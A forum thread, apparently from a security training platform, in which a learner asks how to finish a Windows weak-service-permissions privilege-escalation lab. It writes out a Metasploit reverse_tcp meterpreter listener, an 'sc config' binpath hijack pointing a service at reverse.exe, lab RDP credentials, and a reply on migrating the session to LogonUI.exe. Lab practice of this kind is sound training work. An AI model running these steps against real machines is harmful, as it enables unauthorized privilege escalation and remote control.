Forum Discussion

posewadone23's avatar
posewadone23
Icon for Bronze I rankBronze I
18 days ago

Privilege Escalation: Windows – Weak Service Permissions

Could someone please explain the steps to be performed in last part of the lab?.

Where should I run "migrate -N LogonUI.exe"? It fails in windows and kali.

  1. msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.102.60.159; set lport 4444; exploit"

  2. sc config DeleteFiles binpath="C:\Temp\reverse.exe"

  3. sc qc DeleteFiles shows the path is "C:\Temp\reverse.exe"

  4. Restart windows, but windows doesn´t really restars with "right click" on "windows logo" "Shut Down or Sign out" and  I execute again:

     xfreerdp /v:10.102.158.164 /u:Levi /p:Abc123 /dynamic-resolution

     

  5. migrate -N LogonUI.exe, where and after which steps?

when restarting windows this is the mesage but it doesn´t restart [21:07:26:552] [64590:64591] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]

Regards.

getting started
  • Al13nz's avatar
    Al13nz
    Icon for Bronze II rankBronze II
    16 days ago

    Hi posewadone23 the migrate command is intended to be used within the meterpreter session that spawns from the listener you've got running on Metasploit. The windows service you exploit is unstable so once you have spawned your meterpreter shell you migrate to a more stable process, i.e. LogonUI.exe, to keep your session alive - you use this meterpreter session to complete the lab. There's a collection of labs you can do called "Introduction to Metasploit" that probably explains this better than I have though.